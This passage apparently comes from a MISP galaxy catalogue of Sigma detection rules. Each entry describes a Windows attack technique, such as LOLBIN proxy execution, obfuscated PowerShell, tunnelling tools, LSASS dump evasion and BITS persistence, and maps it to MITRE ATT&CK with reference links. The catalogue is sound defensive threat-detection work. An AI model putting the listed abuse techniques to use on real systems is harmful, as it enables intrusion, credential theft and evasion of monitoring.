  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10993. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://code.visualstudio.com/docs/remote/tunnels

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml

Rebuild Performance Counter Values Via Lodctr.EXE

Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.

The tag is: misp-galaxy:sigma-rules="Rebuild Performance Counter Values Via Lodctr.EXE"

Table 10994. Table References

Links

https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml

Network Reconnaissance Activity

Detects a set of suspicious network related commands often used in recon stages

The tag is: misp-galaxy:sigma-rules="Network Reconnaissance Activity"

Network Reconnaissance Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10995. Table References

Links

https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml

Rundll32 UNC Path Execution

Detects rundll32 execution where the DLL is located on a remote location (share)

The tag is: misp-galaxy:sigma-rules="Rundll32 UNC Path Execution"

Rundll32 UNC Path Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10996. Table References

Links

https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml

Suspicious Add Scheduled Task Parent

Detects suspicious scheduled task creations from a parent stored in a temporary folder

The tag is: misp-galaxy:sigma-rules="Suspicious Add Scheduled Task Parent"

Suspicious Add Scheduled Task Parent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10997. Table References

Links

https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_parent.yml

Potentially Suspicious Regsvr32 HTTP/FTP Pattern

Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Regsvr32 HTTP/FTP Pattern"

Potentially Suspicious Regsvr32 HTTP/FTP Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10998. Table References

Links

https://twitter.com/tccontre18/status/1480950986650832903

https://twitter.com/mrd0x/status/1461041276514623491

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml

HackTool - SharpUp PrivEsc Tool Execution

Detects the use of SharpUp, a tool for local privilege escalation

The tag is: misp-galaxy:sigma-rules="HackTool - SharpUp PrivEsc Tool Execution"

HackTool - SharpUp PrivEsc Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005" with estimative-language:likelihood-probability="almost-certain"

Table 11000. Table References

Links

https://github.com/GhostPack/SharpUp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml

Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE

Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share

The tag is: misp-galaxy:sigma-rules="Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE"

Table 11001. Table References

Links

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml

Screen Capture Activity Via Psr.EXE

Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.

The tag is: misp-galaxy:sigma-rules="Screen Capture Activity Via Psr.EXE"

Screen Capture Activity Via Psr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 11002. Table References

Links

https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://lolbas-project.github.io/lolbas/Binaries/Psr/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml

Renamed PAExec Execution

Detects execution of renamed version of PAExec. Often used by attackers

The tag is: misp-galaxy:sigma-rules="Renamed PAExec Execution"

Renamed PAExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 11003. Table References

Links

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.poweradmin.com/paexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml

Use of Remote.exe

Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.

The tag is: misp-galaxy:sigma-rules="Use of Remote.exe"

Use of Remote.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 11004. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/

https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml

Use of OpenConsole

Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting

The tag is: misp-galaxy:sigma-rules="Use of OpenConsole"

Use of OpenConsole has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11005. Table References

Links

https://twitter.com/nas_bench/status/1537563834478645252

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml

Ilasm Lolbin Use Compile C-Sharp

Detect use of Ilasm.exe to compile c# code into dll or exe.

The tag is: misp-galaxy:sigma-rules="Ilasm Lolbin Use Compile C-Sharp"

Ilasm Lolbin Use Compile C-Sharp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 11006. Table References

Links

https://www.echotrail.io/insights/search/ilasm.exe

https://lolbas-project.github.io/lolbas/Binaries/Ilasm/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml

Suspicious MsiExec Embedding Parent

Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads

The tag is: misp-galaxy:sigma-rules="Suspicious MsiExec Embedding Parent"

Suspicious MsiExec Embedding Parent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 11007. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml

HackTool - KrbRelay Execution

Detects the use of KrbRelay, a Kerberos relaying tool

The tag is: misp-galaxy:sigma-rules="HackTool - KrbRelay Execution"

HackTool - KrbRelay Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 11008. Table References

Links

https://github.com/cube0x0/KrbRelay

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelay.yml

Invoke-Obfuscation Via Stdin

Detects Obfuscated Powershell via Stdin in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin"

Invoke-Obfuscation Via Stdin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11009. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml

Suspicious File Execution From Internet Hosted WebDav Share

Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files

The tag is: misp-galaxy:sigma-rules="Suspicious File Execution From Internet Hosted WebDav Share"

Suspicious File Execution From Internet Hosted WebDav Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11010. Table References

Links

https://twitter.com/ShadowChasing1/status/1552595370961944576

https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml

Suspicious Userinit Child Process

Detects a suspicious child process of userinit

The tag is: misp-galaxy:sigma-rules="Suspicious Userinit Child Process"

Suspicious Userinit Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 11011. Table References

Links

https://twitter.com/SBousseaden/status/1139811587760562176

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml

HH.EXE Execution

Detects the execution of "hh.exe" to open ".chm" files.

The tag is: misp-galaxy:sigma-rules="HH.EXE Execution"

HH.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

Table 11012. Table References

Links

https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml

Potential Fake Instance Of Hxtsr.EXE Executed

HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe

The tag is: misp-galaxy:sigma-rules="Potential Fake Instance Of Hxtsr.EXE Executed"

Potential Fake Instance Of Hxtsr.EXE Executed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11013. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml

Port Forwarding Activity Via SSH.EXE

Detects port forwarding activity via SSH.exe

The tag is: misp-galaxy:sigma-rules="Port Forwarding Activity Via SSH.EXE"

Port Forwarding Activity Via SSH.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

Table 11014. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml

Suspicious Ping/Del Command Combination

Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example

The tag is: misp-galaxy:sigma-rules="Suspicious Ping/Del Command Combination"

Suspicious Ping/Del Command Combination has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 11016. Table References

Links

https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack

https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml

File Download with Headless Browser

Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files

The tag is: misp-galaxy:sigma-rules="File Download with Headless Browser"

File Download with Headless Browser has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11017. Table References

Links

https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html

https://twitter.com/mrd0x/status/1478234484881436672?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml

Persistence Via TypedPaths - CommandLine

Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt

The tag is: misp-galaxy:sigma-rules="Persistence Via TypedPaths - CommandLine"

Table 11018. Table References

Links

https://forensafe.com/blogs/typedpaths.html

https://twitter.com/dez_/status/1560101453150257154

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml

System Disk And Volume Reconnaissance Via Wmic.EXE

An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the wmic command-line utility and has been observed being used by threat actors such as Volt Typhoon.

The tag is: misp-galaxy:sigma-rules="System Disk And Volume Reconnaissance Via Wmic.EXE"

System Disk And Volume Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11019. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_volume.yml

Net WebClient Casing Anomalies

Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques

The tag is: misp-galaxy:sigma-rules="Net WebClient Casing Anomalies"

Net WebClient Casing Anomalies has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11020. Table References

Links

https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_webclient_casing.yml

Suspicious Chromium Browser Instance Executed With Custom Extension

Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension

The tag is: misp-galaxy:sigma-rules="Suspicious Chromium Browser Instance Executed With Custom Extension"

Suspicious Chromium Browser Instance Executed With Custom Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

Table 11021. Table References

Links

https://emkc.org/s/RJjuLa

https://redcanary.com/blog/chromeloader/

https://www.mandiant.com/resources/blog/lnk-between-browsers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml

Suspicious Process Start Locations

Detects suspicious process run from unusual locations

The tag is: misp-galaxy:sigma-rules="Suspicious Process Start Locations"

Suspicious Process Start Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11022. Table References

Links

https://car.mitre.org/wiki/CAR-2013-05-002

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_run_locations.yml

PUA - Chisel Tunneling Tool Execution

Detects usage of the Chisel tunneling tool via the commandline arguments

The tag is: misp-galaxy:sigma-rules="PUA - Chisel Tunneling Tool Execution"

PUA - Chisel Tunneling Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 11023. Table References

Links

https://github.com/jpillora/chisel/

https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/

https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_chisel.yml

Potential DLL Sideloading Via DeviceEnroller.EXE

Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via DeviceEnroller.EXE"

Potential DLL Sideloading Via DeviceEnroller.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 11024. Table References

Links

https://mobile.twitter.com/0gtweet/status/1564131230941122561

https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml

File Download And Execution Via IEExec.EXE

Detects execution of the IEExec utility to download and execute files

The tag is: misp-galaxy:sigma-rules="File Download And Execution Via IEExec.EXE"

File Download And Execution Via IEExec.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11025. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ieexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ieexec_download.yml

Potential Manage-bde.wsf Abuse To Proxy Execution

Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution

The tag is: misp-galaxy:sigma-rules="Potential Manage-bde.wsf Abuse To Proxy Execution"

Potential Manage-bde.wsf Abuse To Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 11026. Table References

Links

https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712

https://twitter.com/bohops/status/980659399495741441

https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md

https://twitter.com/JohnLaTwC/status/1223292479270600706

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml

ImagingDevices Unusual Parent/Child Processes

Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity

The tag is: misp-galaxy:sigma-rules="ImagingDevices Unusual Parent/Child Processes"

Table 11027. Table References

Links

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml

Execution of Suspicious File Type Extension

Detects whether the image specified in a process creation event doesn’t refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.

The tag is: misp-galaxy:sigma-rules="Execution of Suspicious File Type Extension"

Table 11028. Table References

Links

https://pentestlaboratories.com/2021/12/08/process-ghosting/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml

Potential Suspicious Mofcomp Execution

Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Mofcomp Execution"

Potential Suspicious Mofcomp Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11029. Table References

Links

https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml

CodePage Modification Via MODE.COM To Russian Language

Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.

The tag is: misp-galaxy:sigma-rules="CodePage Modification Via MODE.COM To Russian Language"

CodePage Modification Via MODE.COM To Russian Language has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11030. Table References

Links

https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode

https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html

https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml

Malicious Windows Script Components File Execution by TAEF Detection

Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe

The tag is: misp-galaxy:sigma-rules="Malicious Windows Script Components File Execution by TAEF Detection"

Malicious Windows Script Components File Execution by TAEF Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11031. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/

https://twitter.com/pabraeken/status/993298228840992768

https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml

Suspicious PowerShell Encoded Command Patterns

Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Encoded Command Patterns"

Suspicious PowerShell Encoded Command Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11032. Table References

Links

https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd_patterns.yml

7Zip Compressing Dump Files

Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

The tag is: misp-galaxy:sigma-rules="7Zip Compressing Dump Files"

7Zip Compressing Dump Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 11033. Table References

Links

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml

Change Default File Association To Executable Via Assoc

Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

The tag is: misp-galaxy:sigma-rules="Change Default File Association To Executable Via Assoc"

Change Default File Association To Executable Via Assoc has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

Table 11034. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml

Mstsc.EXE Execution From Uncommon Parent

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

The tag is: misp-galaxy:sigma-rules="Mstsc.EXE Execution From Uncommon Parent"

Table 11035. Table References

Links

https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/

https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml

Regsvr32 Execution From Potential Suspicious Location

Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.

The tag is: misp-galaxy:sigma-rules="Regsvr32 Execution From Potential Suspicious Location"

Regsvr32 Execution From Potential Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 11036. Table References

Links

https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/

https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml

Potential SysInternals ProcDump Evasion

Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name

The tag is: misp-galaxy:sigma-rules="Potential SysInternals ProcDump Evasion"

Potential SysInternals ProcDump Evasion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 11038. Table References

Links

https://twitter.com/mrd0x/status/1480785527901204481

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml

Run PowerShell Script from ADS

Detects PowerShell script execution from Alternate Data Stream (ADS)

The tag is: misp-galaxy:sigma-rules="Run PowerShell Script from ADS"

Run PowerShell Script from ADS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 11039. Table References

Links

https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_ads.yml

Monitoring For Persistence Via BITS

BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.

The tag is: misp-galaxy:sigma-rules="Monitoring For Persistence Via BITS"

Monitoring For Persistence Via BITS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 11041. Table References

Links

http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-Part+1/15394[https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism-+Part+1/15394]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml

Explorer Process Tree Break

Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"

The tag is: misp-galaxy:sigma-rules="Explorer Process Tree Break"

